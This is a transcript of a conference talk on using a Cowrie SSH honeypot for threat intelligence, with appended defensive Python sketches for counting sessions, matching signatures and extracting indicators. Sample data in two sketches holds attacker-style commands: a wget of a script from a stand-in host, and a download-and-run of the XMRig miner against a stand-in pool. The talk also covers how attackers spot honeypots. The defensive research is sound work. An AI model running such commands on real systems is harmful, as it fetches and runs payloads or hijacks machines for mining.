
Honeypots, I Shrunk The Data by Oscar Williamson

BSides London · 2023 · 19:34 · 119 views · Published 2023-05

Hi everyone. I'm Oscar, and today I'm going to talk a bit about using honeypots for threat intelligence. To introduce myself: I'm a second-year cyber security student at the University of Warwick, I'm also the technician for the Warwick Cyber Security Society, and that's my Twitter, not that I tweet anything.

First of all, given we're talking about honeypots for threat intelligence, it makes sense to explain what a honeypot is. This is a description from Chris Sanders' very good book about intrusion detection: honeypots rely on deception to encourage attackers to interact with them, and then generate alerts so that you know you've been connected to. The difference is that the book is about intrusion detection. Usually, if you get a connection to a honeypot, the traditional thing to do is panic, because it means you've got someone on your network. With threat intelligence, though, it's exciting if someone connects, because you get some valuable data. So what you want to do is encourage as many attackers as possible to connect to you and collect information such as their IP addresses, the credentials they used to log into your server, and other things like URLs, keys and wallet addresses, because there's a lot of crypto.

Over the summer I worked on an open-source project called Threat Dash, which took the pre-existing SSH honeypot Cowrie, which some of you might have heard of. Cowrie emulates an SSH session but doesn't actually run anything, which is a key distinction. What I did was convert the data coming out of it, store it in a MongoDB instance, including the files attackers uploaded, and then carry out signature analysis on it with YARA rules.

The honeypot itself was hosted on a University of Warwick public IP address. I originally tried hosting it on AWS, but you get a lot fewer connections when you host it there,
presumably because a university is a targeted institution.

This graph shows the attack volume per day across a period of about three months. The blue line is how many connections there were trying to log into the SSH honeypot, and the orange line shows how many of those sessions actually executed commands. You saw a lot of sessions where someone logged in but didn't run any commands, so presumably they were just trying passwords across the internet.

Now, the question we had to ask before going any further is: is it really worth putting all this effort in? You can get a lot of valuable information just from IP addresses and commands, and you can always get more by running more detailed analysis on binaries or by making the honeypot more realistic. But the further you go, the more effort each step requires, and eventually you reach a point where you can spend weeks on one single thing that doesn't return anything of much value. So there's a trade-off: you want to maximize the output, but you don't want to spend too much time on it.

The aim of this project was to take a dataset of about 28,000 interactions and identify unique attacks: being able to look at an attack and say, "Oh yes, I recognize this from a certain attack." The first thing we used was MITRE ATT&CK, which lets you tag activity with specific techniques. I'll admit I'm not very familiar with MITRE ATT&CK, so mapping to it was quite hard. I was able to identify about 19 techniques, when about 224 exist, so I most likely missed some of the techniques MITRE ATT&CK lists. At the same time, it's not an easy thing to work with: looking at a set of commands run in an SSH session and mapping them to MITRE ATT&CK is not that easy. So then, the way I tried to look for unique attacks was to look for
unique combinations of MITRE ATT&CK techniques, and using that I was able to identify 51 different attacks. But when you start to drill down into that, because there are only 19 possible techniques, there's a lot of overlap: you saw attacks that were clearly very different being categorized under the same thing.

To give an example, let's look at the System Information Discovery technique in MITRE ATT&CK, where an attacker tries to get some information about the system. When an attacker on the internet connects to a random IP address they've found, most attacks are trying to learn something about what they've discovered. Here I've got a few examples of things that came under System Information Discovery, and as you'll see, they're quite different, so putting them under one technique was quite broad really. There were attacks that tried to read the /bin/echo binary, which is a traditional way to identify whether the system architecture is 32- or 64-bit, because you can read the ELF header. With /ip cloud print, if you look that up, you know they're trying to target MikroTik routers, because that command is specific to them. And with the nvidia-smi command, you know the attacker is looking for information about the GPU, so they're most likely trying to do some crypto mining. So if you drill down into the specific commands being run, not just the MITRE ATT&CK techniques, you start to realize you can get more context from them.

So the solution, rather than using MITRE ATT&CK, was to take the commands, manually go through them and categorize them into unique individual things. I tried experimenting with string similarity, setting a threshold where, say, strings that are 60% similar count as the same, but that didn't really work out. So instead I went to YARA rules and tried to write signatures for each possible attack, because, as we saw before, MITRE ATT&CK just tells you what technique is being used, but it doesn't give you any context. With these rules, and the notes in them, you're able to identify what specific OS was being targeted, what the aim of the attack was, and what exactly they were trying to do.

Also, because a lot of these attacks are automated, you see unique usages of certain commands. For example, as you see in the YARA rule on the slide, there's a very specific usage of the uname command, with several arguments in a very specific order, and because it's automated, that attacker always used the arguments in that order. So I have several rules in the dataset that just look for uname commands, but with the arguments in slightly different orders or permutations, because that was able to uniquely identify an attack. By comparison, I was able to identify 51 unique attacks with MITRE ATT&CK, but when I started writing these custom signatures I got that up to 100, which started to reveal the breadth of what was actually in the dataset. And as I said, YARA rules have a defined format, and you can also write comments and add notes, so reviewing them is a lot more useful.

So, to quickly explain what sort of things we're seeing in this dataset: it turns out that when you put an SSH server that anyone can log into on the internet, people basically try to crypto mine. At least 17 of all the attacks seen, and these were attacks with commands, not just general connections, explicitly did something related to crypto. That number is a massive underestimate, because a lot of attacks that I didn't go into in depth were downloading shell scripts and running them, and when you start to look at those, most of them are also crypto mining. So what were these crypto mining attacks looking for? A big one was looking for Hive OS systems, Hive OS being a distribution specifically for crypto mining. You can tell that because it's using a
specific Hive OS password command, or it's looking for a VNC password text file, because apparently Hive OS stores its VNC passwords in plain text, or for a configuration file. There was also XMRig, which is a miner; you can identify that by spotting the GitHub download link. And there you've got another interesting indicator you could use for threat intelligence, because a lot of these commands had wallet addresses in them, so you could use those for mapping later. There were a lot of other crypto miners being downloaded or looked for, too.

The other thing about honeypots, as I said, is that they rely on deception, so you need an attacker to believe they're real. What we've seen so far is mostly automated attacks, but if you have an attacker who actually knows what they're looking for, who is hands-on-keyboard and starting to look around, it suddenly becomes quite easy to work out whether you're in a honeypot or not. First things first: if you've ever used Cowrie, you'll know it has a default hostname of svr04, so any attacker who knows what they're doing would see that hostname and immediately log out, because they know they're in a honeypot. So the very first thing you want to do is change that. I think the instance I have running uses "production" as its hostname; hopefully that seems appealing to an attacker.

The other thing I mentioned is that Cowrie emulates its commands, so it only knows what's programmed into it. For example, a lot of the attacks I saw over the summer were trying to read the uptime file, /proc/uptime, to see how long the system had been up, and that didn't exist in Cowrie at the time, so I decided to add it. It's not even dynamic: I just put in a file with a number in it. Hopefully, to an attacker, that makes it seem a little more realistic, because if you log into a system and you can't find /proc/uptime, you might start to have questions about what's going on. The
other thing that was missing was the lspci command, which lists the PCI devices available on a machine. My first instinct was just to create the command, run lspci on my local machine and copy the output. But the important thing, as you can see in this picture, is that I was doing my work in a virtual machine and the output gives that away, and that's one of the ways an attacker detects virtualization. Whilst that might not suggest a honeypot, it might suggest to an attacker that they're in some sandboxed environment, potentially putting them off giving up any information that might be useful for threat intelligence. So I was very careful to find output that didn't indicate any form of virtualization, just to make it seem a little more appealing to an attacker.

So the question at the end of all this is: honeypots, are they worth it for threat intelligence? The answer is that if you put a box on a random IP address on the internet, it probably won't be that interesting. You'll just see a lot of botnets, crypto mining and so on, nothing really that new. But as we sort of saw by putting it on a university IP address, if you're an organization that's perhaps of interest to specific threat groups, you might start to see something more unique. So if you're particularly concerned about your threat model, having a honeypot for threat intelligence might be useful. The other thing is that you just have to be patient: it took days before anything interesting came through, so you have to sit tight. Some days you'll get loads of attacks, and some days you'll get nothing. And the last thing is that most of the attacks you'll see have already been reported on. It's very easy to see something, get excited about it, look it up, and find that someone has done a really good write-up of it, so you're not really generating anything new in terms of threat intelligence. But the reason I talked about it today is that it was just fun. In the end, you don't really
discover anything new, but at the same time you get to see what's going on on the internet and get your own idea of who's scanning what. So, thank you. Any questions?

[Applause]

Well, thank you. I wish I'd had one of those at school. Would you have liked to have had the opportunity to mount any of the address space not currently in use at the university? That would obviously reduce the probability significantly.

Would you be able to repeat the question, sorry?

Yep. Assuming your university has a block of address space, would you have liked the opportunity to mount any of the spare address space with honeypot servers, perhaps redirecting to your one, and then potentially much reduce the probability and therefore see significantly more activity?

Yeah, I mean, I haven't really thought in depth about the effects of the IP addresses. I kind of just used what I was given, but I think exploring that more in depth would definitely be very interesting.

Any more questions?

If you're putting something on the internet to be exploited, just to see what they're doing, do you worry that someone might try to use the resource that's hosted and used by you to, let's say, stage indecent images or other things that could potentially come back to you?

Oh yeah, that's definitely a worry. That's kind of why the model behind Cowrie as a honeypot is that it's entirely emulation-based: nothing that's run is actually executed. I guess you are saving the files, so you would be saving anything indecent that's uploaded, but not publicly. So in terms of emulation, I don't think there's any particular concern there.

Did your honeypot get any sort of actionable information that you were able to share during the three months you had it running?

Not necessarily. I do have a list of IP addresses and things; I tried exporting all
that. I mean, there is information to be shared, but nothing that isn't already out there; all these IP addresses and things are being mapped by bigger threat intelligence efforts anyway.

Do you have any future research questions, or any other queries you'd like to answer with a similar set of experiments?

I think the interesting thing that was considered out of this was whether we could do the same for Windows and RDP. But Windows is just a lot harder to work with, and trying to emulate it is a challenge, so it would be about looking to actually sandbox a Windows environment.

Cool, thanks. One of the interesting things about this: when you first started, I was thinking, how could I apply this? Probably because my background is more GRC. One of the things people struggle with is understanding the real value of an asset. I could see that if you were to deploy a series of honeypots indicating that someone could have access to a specific asset, maybe, in a university, some research that's being done, that could actually allow you to classify or get a real value for that asset: what's the likelihood that someone would want to try to access it? That could then feed into your risk assessment, which I think is quite interesting. Is that something you've thought about? Are there a lot of applications along that same line of thinking, or any other applications where you think honeypots could be useful?

Yeah, no, definitely. I think that's the point I was trying to make about specific companies: it might provide a specific value. Obviously, the context I was doing it in was just general internet-facing honeypots, but I can imagine that if you were to
try and emulate something you were specifically interested in, emulating its characteristics, it could give you interesting information, and also some idea of what's actually targeting your organization.

Yeah, definitely. Because that's the sort of information you can get, you can start to tag IP addresses and any other indicators, so you can really build up your own internal threat intelligence on that.

Did you try different output in lspci? If you included a high-performance graphics card, would you see them run further commands versus disconnecting?

Please say that again?

So with lspci, you could include, say, an NVIDIA graphics card. Did you look at whether they ran further commands after finding the graphics card, versus not finding one and just disconnecting?

Yeah, definitely. With the commands about GPUs, you often saw greps for certain patterns. The interesting thing I found with a lot of those greps is that they never seemed to particularly affect what the attacker actually ran afterwards. It seems a lot of attackers collect information to store for themselves but never actually do anything with it. But yeah, I definitely tried to make the lspci output look a bit more enticing with NVIDIA graphics.

Obviously, by putting it on a university network, did you have any ethical concerns had they broken out of your virtual environment?

Not insofar as the way it was set up. I was very lucky to work with a very skilled technician, who made sure that, although it was on the public IP address range, it was an isolated lab environment and properly firewalled, so there wasn't any risk there.

Is that all? Any more questions? Last call? No? Excellent. Well, let's give Oscar a round of applause.
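The talk describes converting Cowrie's output into a database and plotting login sessions against sessions that actually ran commands. The following is a minimal sketch of those per-day counts, not Threat Dash's code. It assumes Cowrie's JSON log format (one event per line with `eventid`, `session` and `timestamp` fields), keeps everything in memory instead of MongoDB, and treats any session with a `cowrie.login.success` or `cowrie.login.failed` event as a login attempt. The function name and the sample events are hypothetical.

```python
import json
from collections import defaultdict


def daily_session_counts(lines):
    """Per day, count sessions with a login attempt and sessions that ran commands.

    `lines` is an iterable of JSON strings, one Cowrie event per line.
    Returns {"YYYY-MM-DD": (login_sessions, command_sessions)}.
    """
    login_sessions = defaultdict(set)    # day -> session IDs that attempted a login
    command_sessions = defaultdict(set)  # day -> session IDs that ran at least one command
    for line in lines:
        event = json.loads(line)
        day = event["timestamp"][:10]  # date part of the ISO 8601 timestamp
        if event["eventid"] in ("cowrie.login.success", "cowrie.login.failed"):
            login_sessions[day].add(event["session"])
        elif event["eventid"] == "cowrie.command.input":
            command_sessions[day].add(event["session"])
    days = sorted(set(login_sessions) | set(command_sessions))
    return {d: (len(login_sessions[d]), len(command_sessions[d])) for d in days}


if __name__ == "__main__":
    # Made-up events in the shape of Cowrie's JSON log.
    sample = [
        '{"eventid": "cowrie.login.failed", "session": "a1", "timestamp": "2022-07-01T10:00:00Z"}',
        '{"eventid": "cowrie.login.success", "session": "b2", "timestamp": "2022-07-01T11:00:00Z"}',
        '{"eventid": "cowrie.command.input", "session": "b2", "timestamp": "2022-07-01T11:00:05Z", "input": "uname -a"}',
        '{"eventid": "cowrie.login.success", "session": "c3", "timestamp": "2022-07-02T09:00:00Z"}',
    ]
    print(daily_session_counts(sample))  # {'2022-07-01': (2, 1), '2022-07-02': (1, 0)}
```

The sketch counts distinct session IDs rather than raw events. That way, a bot that retries the same command many times in one session still counts once toward the "ran commands" line.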
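The first approach in the talk grouped sessions by their unique combination of MITRE ATT&CK techniques. The sketch below is one way that grouping might look. The command-to-technique mapping is a hypothetical, deliberately tiny stand-in for the manual mapping described. The technique IDs themselves are real ATT&CK identifiers: T1082 System Information Discovery, T1033 System Owner/User Discovery and T1105 Ingress Tool Transfer. The example reproduces the problem the talk raises: reading /bin/echo, `/ip cloud print` and nvidia-smi all collapse into the same single-technique group.

```python
import re

# Hypothetical, deliberately tiny mapping from command patterns to real ATT&CK technique IDs.
TECHNIQUE_PATTERNS = {
    # System Information Discovery
    "T1082": re.compile(r"\b(uname|nvidia-smi|lscpu)\b|/proc/cpuinfo|/bin/echo|/ip cloud print"),
    # System Owner/User Discovery
    "T1033": re.compile(r"\bwhoami\b"),
    # Ingress Tool Transfer
    "T1105": re.compile(r"\b(wget|curl|tftp)\b"),
}


def techniques_for_session(commands):
    """Return the frozenset of technique IDs matched by any command in one session."""
    return frozenset(
        tid
        for tid, pattern in TECHNIQUE_PATTERNS.items()
        if any(pattern.search(cmd) for cmd in commands)
    )


def group_by_combination(sessions):
    """Map each distinct technique combination (one candidate 'attack') to its session IDs."""
    groups = {}
    for session_id, commands in sessions.items():
        combo = techniques_for_session(commands)
        if combo:  # sessions matching no technique are left out
            groups.setdefault(combo, []).append(session_id)
    return groups


if __name__ == "__main__":
    sessions = {
        "s1": ["cat /bin/echo"],    # ELF-header architecture probe
        "s2": ["/ip cloud print"],  # MikroTik-specific command
        "s3": ["nvidia-smi -q"],    # GPU discovery, likely mining
        "s4": ["whoami", "wget http://example.invalid/x.sh"],
    }
    for combo, ids in group_by_combination(sessions).items():
        print(sorted(combo), ids)
```

Three clearly different sessions end up under one key. With only a handful of techniques in play, this loss of context is the limitation the talk describes.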
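Reading /bin/echo works as an architecture probe because every ELF file starts with a fixed header. Byte 4 (`EI_CLASS`) is 1 for 32-bit and 2 for 64-bit, byte 5 (`EI_DATA`) gives the byte order, and bytes 18-19 hold the `e_machine` field. The decoder below is a minimal sketch that assumes the first 20 bytes of the file are available; its machine table lists only a few common values. For a honeypot, this also means that whatever bytes are returned for /bin/echo determine the architecture an attacker's script infers.

```python
import struct

# A few e_machine values from the ELF specification; not an exhaustive table.
MACHINES = {3: "x86", 8: "MIPS", 40: "ARM", 62: "x86-64", 183: "AArch64"}


def elf_summary(header: bytes):
    """Decode (word size, byte order, machine) from the first 20 bytes of an ELF file."""
    if len(header) < 20 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF header")
    bits = {1: 32, 2: 64}[header[4]]     # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    order = {1: "<", 2: ">"}[header[5]]  # EI_DATA: 1 = little-endian, 2 = big-endian
    (machine,) = struct.unpack(order + "H", header[18:20])  # e_machine, in the file's byte order
    endian = "little" if order == "<" else "big"
    return bits, endian, MACHINES.get(machine, f"unknown ({machine})")


if __name__ == "__main__":
    # Synthetic header for a 64-bit little-endian x86-64 executable: magic, EI_CLASS=2,
    # EI_DATA=1, EI_VERSION=1, 9 zero bytes (EI_OSABI, EI_ABIVERSION, EI_PAD),
    # then e_type=2 (executable) and e_machine=62.
    fake = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9) + struct.pack("<HH", 2, 62)
    print(elf_summary(fake))  # (64, 'little', 'x86-64')
```

On a Linux machine, `elf_summary(open("/bin/echo", "rb").read(20))` performs the same check an attacker's script does.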
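The uname signatures work because automated tools always emit the same flags in the same order. The transcript doesn't reproduce the YARA rule shown on the slide, so the following is a plain-Python stand-in with hypothetical flag orders. It tokenizes a command line and reports a signature only when that signature's tokens appear contiguously and in exactly that order. A permutation of the same flags therefore counts as a different tool.

```python
import re

# Hypothetical signatures: each is the exact uname invocation of one automated tool.
# These flag orders are illustrative, not taken from the talk's dataset.
SIGNATURES = {
    "uname_variant_a": ["uname", "-s", "-v", "-n", "-r", "-m"],
    "uname_variant_b": ["uname", "-m", "-r", "-n", "-v", "-s"],
}


def match_signatures(command_line):
    """Return names of signatures whose tokens appear contiguously and in order."""
    # Split on whitespace and common shell separators so "cd /tmp; uname ..." is tokenized.
    tokens = re.split(r"[\s;|&]+", command_line.strip())
    hits = []
    for name, sig in SIGNATURES.items():
        n = len(sig)
        if any(tokens[i:i + n] == sig for i in range(len(tokens) - n + 1)):
            hits.append(name)
    return hits


if __name__ == "__main__":
    print(match_signatures("uname -s -v -n -r -m"))           # ['uname_variant_a']
    print(match_signatures("cd /tmp; uname -m -r -n -v -s"))  # ['uname_variant_b']
    print(match_signatures("uname -a"))                       # []
```

Matching exact token order is deliberately brittle. That brittleness is what lets a fixed argument order fingerprint one specific automated tool.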
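Wallet addresses and download links in attackers' commands can be pulled out as indicators, as described for the crypto-mining attacks. The sketch below makes two assumptions. First, it treats Monero-style addresses (95 base58 characters starting with 4 or 8) as the wallet format; this is a heuristic that does not verify checksums. Second, it flags XMRig downloads by the `github.com/xmrig/xmrig` path. The sample command, pool host and wallet are made up.

```python
import re

# URLs up to whitespace, quotes or common shell separators.
URL_RE = re.compile(r"https?://[^\s'\";|&]+")
# Heuristic for Monero-style addresses: 95 base58 characters starting with 4 or 8.
# It does not verify the checksum, so treat matches as candidates only.
MONERO_RE = re.compile(r"\b[48][1-9A-HJ-NP-Za-km-z]{94}\b")


def extract_indicators(command):
    """Pull candidate indicators (URLs, XMRig downloads, wallet addresses) from one command."""
    urls = URL_RE.findall(command)
    return {
        "urls": urls,
        "xmrig_downloads": [u for u in urls if "github.com/xmrig/xmrig" in u.lower()],
        "wallets": MONERO_RE.findall(command),
    }


if __name__ == "__main__":
    wallet = "4" + "A" * 94  # placeholder, not a real address
    cmd = ("cd /tmp && wget https://github.com/xmrig/xmrig/releases/download/v0.0.0/xmrig.tar.gz"
           " && ./xmrig -o pool.example.invalid:3333 -u " + wallet)
    print(extract_indicators(cmd))
```

Storing the extracted wallets alongside each session makes it possible to link attacks that share a wallet even when their source IPs differ.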
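Before copying lspci output into the honeypot, a simple substring scan can check it for virtualization giveaways, as in the care the talk describes. The marker list below is an assumption covering some common hypervisors and virtual devices; it is not exhaustive. Substring matching can also produce false positives, for example "xen" inside an unrelated vendor string, so hits are worth reviewing by hand.

```python
# Substrings that commonly appear in lspci output inside virtual machines (assumed, not exhaustive).
VM_MARKERS = ("vmware", "virtualbox", "innotek", "qemu", "virtio", "hyper-v", "bochs", "xen")


def virtualization_hints(lspci_output):
    """Return (line, marker) pairs for lspci lines that mention a known virtualization marker."""
    hits = []
    for line in lspci_output.splitlines():
        lowered = line.lower()
        for marker in VM_MARKERS:
            if marker in lowered:
                hits.append((line.strip(), marker))
                break  # one marker per line is enough
    return hits


if __name__ == "__main__":
    captured = (
        "00:02.0 VGA compatible controller: VMware SVGA II Adapter\n"
        "00:03.0 Ethernet controller: Intel Corporation 82540EM Gigabit Ethernet Controller (rev 02)"
    )
    for line, marker in virtualization_hints(captured):
        print(f"{marker}: {line}")
```

An empty result doesn't prove the output looks like bare metal. It only means none of the listed strings appear, so the output is still worth a manual read.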